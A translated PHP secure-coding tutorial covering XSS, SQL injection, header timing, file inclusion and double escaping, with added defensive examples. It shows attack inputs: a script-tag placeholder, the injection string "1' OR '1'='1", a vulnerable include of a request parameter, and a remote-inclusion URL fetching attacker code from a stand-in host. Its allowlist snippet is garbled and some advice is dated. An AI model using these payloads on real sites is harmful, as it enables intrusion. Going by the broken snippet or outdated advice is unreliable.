PHP errors that are easy to make when writing secure code - PHP Tutorial

Source: Internet
Author: User
Summary: a list of mistakes that are easy to make when writing secure PHP code.
1. Not escaping HTML entities
Basic rule: all untrusted input (especially data submitted by the user through a form) must be escaped before it is output.
echo $_GET['username'];
If the request carries something like the following, this line echoes it straight into the page:
<script>/* script that changes the admin password or sets a cookie */</script>
This is an obvious security risk, unless you can be sure that every one of your users is well behaved.
How to fix:
We need to convert "<", ">", "&", "'" and """ into their HTML entity representations (&lt;, &gt;, &amp;, &#039; and &quot;); the functions htmlspecialchars() and htmlentities() do exactly this. Pass ENT_QUOTES so that single quotes are escaped too (otherwise a value placed inside a single-quoted attribute can still break out), and give the character set as the third argument.
The correct method:
echo htmlspecialchars($_GET['username'], ENT_QUOTES);
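As an added example (not from the original article), the following shows why the ENT_QUOTES flag matters. Two constructed attacker values, one for the HTML body and one for an attribute, are echoed raw, then through an escaping helper named e() (an assumption of this example), and finally through htmlspecialchars() with the ENT_COMPAT behaviour that was the default before PHP 8.1, which leaves the single quote alone:

```php
<?php
// Added example, not code from the original article: escaping untrusted input
// for HTML body and attribute contexts. The helper name e() and the sample
// inputs are assumptions made for this example.

// Constructed attacker-controlled values, as they might arrive in $_GET.
$samples = [
    'body'      => '<script>/* steal the cookie */</script>',
    'attribute' => "x' onmouseover='alert(1)",   // breaks out of a single-quoted attribute
];

// Escape for output inside an HTML document. ENT_QUOTES escapes both ' and ",
// which matters inside attribute values; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string; the explicit charset
// removes any ambiguity about how bytes are grouped into characters.
function e(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Unsafe: a raw echo reproduces the attacker's markup in the page.
echo "Unsafe body:      " . $samples['body'] . "\n";
echo "Unsafe attribute: <input value='" . $samples['attribute'] . "'>\n";

// Safe: the same values rendered through e().
echo "Safe body:        " . e($samples['body']) . "\n";
echo "Safe attribute:   <input value='" . e($samples['attribute']) . "'>\n";

// With ENT_COMPAT (the default before PHP 8.1) the single quote is left alone,
// so the attribute payload above still breaks out of the attribute.
echo "ENT_COMPAT only:  <input value='"
    . htmlspecialchars($samples['attribute'], ENT_COMPAT, 'UTF-8') . "'>\n";
```

Run it from the command line and compare the "Safe attribute" line (the quote becomes &#039;) with the "ENT_COMPAT only" line, which comes out byte for byte as the attacker typed it.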
2. Ignoring SQL input
I covered this in "The simplest way to prevent SQL injection (in PHP + MySQL)" and gave a simple method there. Some people have told me that they already set magic_quotes_gpc = On in php.ini and so need not worry about it. But magic quotes only touch $_GET, $_POST and $_COOKIE, and not all input comes from there (think of values read from files, other databases or web services). Magic quotes were also removed in PHP 5.4, so they cannot be relied on at all.
How to fix:
As in that article, escape every value with mysql_real_escape_string() before it goes into the query. Note that this function needs an open MySQL connection, and that the whole mysql_* extension was removed in PHP 7; on current PHP, use prepared statements with PDO or mysqli rather than escaping strings by hand.
Correct practice:

The code is as follows:

<?php
$sql = "UPDATE users SET
            name = '" . mysql_real_escape_string($name) . "'
        WHERE id = '" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
?>
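The article's fix escapes strings by hand. As an added example (not from the original article), the following runs the same UPDATE twice, once built by string concatenation and once as a prepared statement, so that the effect of a constructed injection value can be seen on real rows. It swaps in PDO with an in-memory SQLite database (the pdo_sqlite extension must be present) so that it runs without a MySQL server; the table layout and the attacker value are assumptions of this example:

```php
<?php
// Added example, not code from the original article: the same UPDATE built by
// string concatenation versus a prepared statement. Uses an in-memory SQLite
// database through PDO so it runs offline; table layout, sample rows and the
// attacker value are constructed for this example.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Constructed attacker input for the id parameter: closes the quote and
// appends a condition that is always true.
$id   = "1' OR '1'='1";
$name = 'pwned';

// Vulnerable: the value is pasted into the SQL text, so the WHERE clause
// becomes  id = '1' OR '1'='1'  and every row is updated.
$unsafeSql = "UPDATE users SET name = '$name' WHERE id = '$id'";
$affected  = $db->exec($unsafeSql);
echo "Concatenated query changed $affected row(s)\n";   // 3

// Put the original names back before the second run.
$db->exec("UPDATE users SET name = CASE id WHEN 1 THEN 'alice' WHEN 2 THEN 'bob' ELSE 'carol' END");

// Hardened: placeholders keep data and SQL apart. The id value is sent as an
// opaque string, is compared as such, and matches no row.
$stmt = $db->prepare('UPDATE users SET name = :name WHERE id = :id');
$stmt->execute([':name' => $name, ':id' => $id]);
echo "Prepared statement changed " . $stmt->rowCount() . " row(s)\n";   // 0

foreach ($db->query('SELECT id, name FROM users ORDER BY id') as $row) {
    echo "{$row['id']} {$row['name']}\n";
}
```

The same two calls work unchanged against MySQL by swapping the DSN; the point is that with a prepared statement the escaping is done by the driver for every parameter, so there is no value that can be forgotten.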


3. Misusing the HTTP-header-related functions: header(), session_start() and setcookie()
Have you ever seen this warning? "Warning: Cannot add header information - headers already sent [...]"

Every page the server returns consists of two parts: the header and the body.
The header carries non-visible data such as cookies and always arrives first. The body carries the visible HTML, images and other data.
When output_buffering is Off, every HTTP-header-related function must be called before any output is produced (a stray echo, or even whitespace before an opening <?php tag in an included file, counts as output). The trap is that you develop in one environment and deploy in another, and the output_buffering setting differs between them: what worked on the development machine suddenly fails in production, and cookies and sessions are no longer set correctly.

How to fix:
Call every HTTP-header-related function before producing any output, and develop with output_buffering = Off so that a misplaced call shows up as a warning on your own machine instead of only after deployment.
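As an added example (not from the original article), here is a small wrapper that sets a cookie only while headers can still be sent, and otherwise logs the file and line where output began, which is exactly the information needed to find the stray echo. The function name, cookie name and cookie flags are assumptions of this example; it needs PHP 7.3 or later for the options array and is meant to run under a web SAPI (for instance php -S localhost:8080), where headers are really sent:

```php
<?php
// Added example, not code from the original article: a setcookie() wrapper
// that checks headers_sent() first. Function name, cookie name and flags are
// assumptions; run it under a web SAPI such as `php -S localhost:8080`.

function set_session_cookie(string $name, string $value): bool
{
    if (headers_sent($file, $line)) {
        // Output has already started (a stray echo, or whitespace before an
        // opening <?php tag in an included file), so no header can be added.
        error_log("cannot set cookie '$name': output started in $file on line $line");
        return false;
    }
    return setcookie($name, $value, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,    // only sent over HTTPS
        'httponly' => true,    // not readable from JavaScript
        'samesite' => 'Lax',
    ]);
}

// Correct order: all header work first, body afterwards.
$ok = set_session_cookie('sid', 'example-session-id');   // true
echo "<html><body>cookie set: " . ($ok ? 'yes' : 'no') . "</body></html>\n";

// Wrong order: the body has already been flushed, so this call returns false
// and the error log names the file and line where output began.
$late = set_session_cookie('late', 'x');                 // false
```

With output_buffering = On the second call would succeed, because the body is still held in memory; that is precisely why a bug of this kind stays hidden in development and surfaces in production.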
4. Using untrusted data in require or include
Again, do not trust any data that you did not declare yourself. Never include or require a file whose name comes from $_GET, $_POST or $_COOKIE.
For example:

The code is as follows:

index.php:
<?php
// include header, config, database connection, etc.
include($_GET['filename']);
// include footer
?>


Now any attacker can request: http://www.yourdomain.com/index.php?filename=anyfile.txt
to read your confidential files or to execute a PHP script of their choosing.
If allow_url_fopen = On, it is even worse (since PHP 5.2 the separate allow_url_include setting governs this, and it is Off by default):
Try this input:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php
Now your page includes, and executes, whatever PHP code http://domain.com/phphack.php returns: the attacker can send spam, change passwords, delete files, and so on, anything the web server's user can do.
How to fix:
You must control which files include and require can load.
The following is a quick but incomplete solution (it still passes the request value itself to include(), so it is only as good as the allowlist is exact):

The code is as follows:


// Include only files that are allowed.
$ AllowedFiles = array('file1.txt', 'file2.txt', 'file3.txt ');
If (in_array (string) $ _ GET ['filename'], $ allowedFiles )){
Include ($ _ GET ['filename']);
}
Else {
Exit ('not allowed ');
}
?>
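As an added example (not from the original article), the following is a stricter version of the allowlist. The request supplies a page key, never a file name; the key is mapped to a file inside one fixed directory, and realpath() confirms that the resolved file really is inside that directory, so neither the traversal nor the remote-URL inputs from above can reach include(). The page names, the throw-away temporary directory and the helper name resolve_page() are assumptions of this example:

```php
<?php
// Added example, not code from the original article: key-to-file mapping plus
// a realpath() containment check. Page names, the temporary directory and the
// helper resolve_page() are assumptions made for this example.

// Key => file name. Nothing taken from the request is ever passed to include().
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $pageDir, string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                                   // unknown key: reject
    }
    $base = realpath($pageDir);
    $file = realpath($pageDir . '/' . PAGES[$key]);
    // realpath() returns false for missing files and resolves ../ and symlinks,
    // so a final prefix check guards even against a bad entry in PAGES.
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Set up a throw-away page directory so the example runs anywhere.
$pageDir = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($pageDir);
foreach (PAGES as $name) {
    file_put_contents("$pageDir/$name", "<?php echo 'rendered $name';\n");
}

// Constructed inputs, including the attack strings from the article.
$inputs = ['home', '../../etc/passwd', 'http://domain.com/phphack.php', 'contact', ''];
foreach ($inputs as $requested) {
    $file = resolve_page($pageDir, $requested);
    if ($file === null) {
        printf("%-32s => rejected\n", $requested);
        continue;
    }
    printf("%-32s => ", $requested);
    include $file;                                     // prints "rendered home.php"
    echo "\n";
}

// Remove the temporary files again.
foreach (PAGES as $name) {
    unlink("$pageDir/$name");
}
rmdir($pageDir);

// In a real page:
// $file = resolve_page(__DIR__ . '/pages', (string) ($_GET['page'] ?? 'home'));
// if ($file === null) { http_response_code(404); exit('not found'); }
// include $file;
```

Only the two listed keys produce an include; the traversal string, the URL and the empty string are all rejected before any file system access beyond the lookup.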


5. Syntax errors
Syntax errors cover all lexical and grammatical mistakes; they are so common that they have to be listed here. The remedy is to study PHP syntax carefully and not to drop a bracket, brace, semicolon or quotation mark. The other remedy is to change your editor: stop using Notepad and use one that highlights syntax and matches brackets.
6. Rarely or never using object orientation
Many projects do not use PHP's object-oriented features, and as a result maintaining the code becomes very time-consuming and labor-intensive. PHP's object-oriented support keeps growing and improving, so there is no reason not to use it.
7. Not using a framework
95% of PHP projects do the same four things: create, edit, list and delete. There are now many MVC frameworks that handle these four things for us, so why not use them?
8. Not knowing the functions PHP already has
The PHP core contains a great many functions, yet many programmers keep reinventing the wheel and waste a lot of time doing so. Search the PHP manual before you write code, and search Google too; you may be surprised by what already exists. For example, exec() is a powerful function that runs a shell command and returns the last line of its output as a string. For safety, wrap every untrusted argument in escapeshellarg(), and use escapeshellcmd() only when you must pass a whole command string.
9. Using an old PHP version
Many programmers still use PHP 4. Developing on PHP 4 cannot exploit PHP's full potential and leaves some security risks in place. Moving to PHP 5 takes little effort: most PHP 4 programs can be migrated with few or no changes. According to a survey at http://www.nexen.net, only 12% of PHP servers run PHP 5, so 88% of PHP developers are still on PHP 4.
10. Escaping quotes twice
Have you ever seen \' or \" on a web page? This usually happens because magic_quotes_gpc is Off in the developer's environment but On on the deployment server, where PHP then runs addslashes() over the GET, POST and COOKIE data automatically, and the application runs addslashes() on it a second time.
Original text:
It's a string

Magic quotes On:
It\'s a string

addslashes() run again:
It\\\'s a string

HTML output:
It\\\'s a string

The other case is a failed login: the user enters wrong details, the server detects the error and outputs the same form again with the user's input filled in. The re-displayed value still carries the backslashes that magic quotes added, and when the form is submitted again it is escaped a second time.
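As an added example (not from the original article), the following reproduces the double escaping step by step and then shows the fix: undo the automatic slashes exactly once at the input boundary and escape once per destination from the raw value. Because magic_quotes_gpc was removed in PHP 5.4, its effect is simulated with addslashes(), which is what it applied to every GET/POST/COOKIE value; the input string is constructed and the helper name raw_input() is an assumption of this example:

```php
<?php
// Added example, not code from the original article: double escaping caused by
// magic quotes plus addslashes(), and a boundary normalisation that undoes it
// once. Magic quotes are simulated with addslashes(); the input string and the
// helper name raw_input() are constructed for this example.

$typed = "It's a string";

// 1. What arrived in $_POST on a server with magic_quotes_gpc = On.
$fromRequest = addslashes($typed);
echo "magic quotes:        $fromRequest\n";          // It\'s a string

// 2. Code written for a magic-quotes-off server escapes it again for SQL.
$escapedTwice = addslashes($fromRequest);
echo "addslashes() again:  $escapedTwice\n";         // It\\\'s a string

// 3. Re-displaying the request value in the form leaks the backslash to the page.
echo "form re-display:     <input value=\"" . htmlspecialchars($fromRequest, ENT_QUOTES) . "\">\n";

// Fix: strip the automatic slashes once, at the boundary, and only if magic
// quotes were really on. In real code $magicQuotesOn would be
//   function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()
// (the function was removed in PHP 8, hence the guard); here it is passed in.
function raw_input(string $value, bool $magicQuotesOn): string
{
    return $magicQuotesOn ? stripslashes($value) : $value;
}

$raw = raw_input($fromRequest, true);
echo "normalised:          $raw\n";                  // It's a string

// Escape exactly once per destination, always starting from the raw value.
// addslashes() stands in here for what a prepared statement would do for you.
echo "for SQL:             " . addslashes($raw) . "\n";                                       // It\'s a string
echo "for HTML:            <input value=\"" . htmlspecialchars($raw, ENT_QUOTES) . "\">\n";   // It&#039;s a string
```

The rule the example encodes is that input is normalised once, kept raw inside the application, and escaped only at the point where it leaves for a specific consumer (the database or the browser), never in between.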
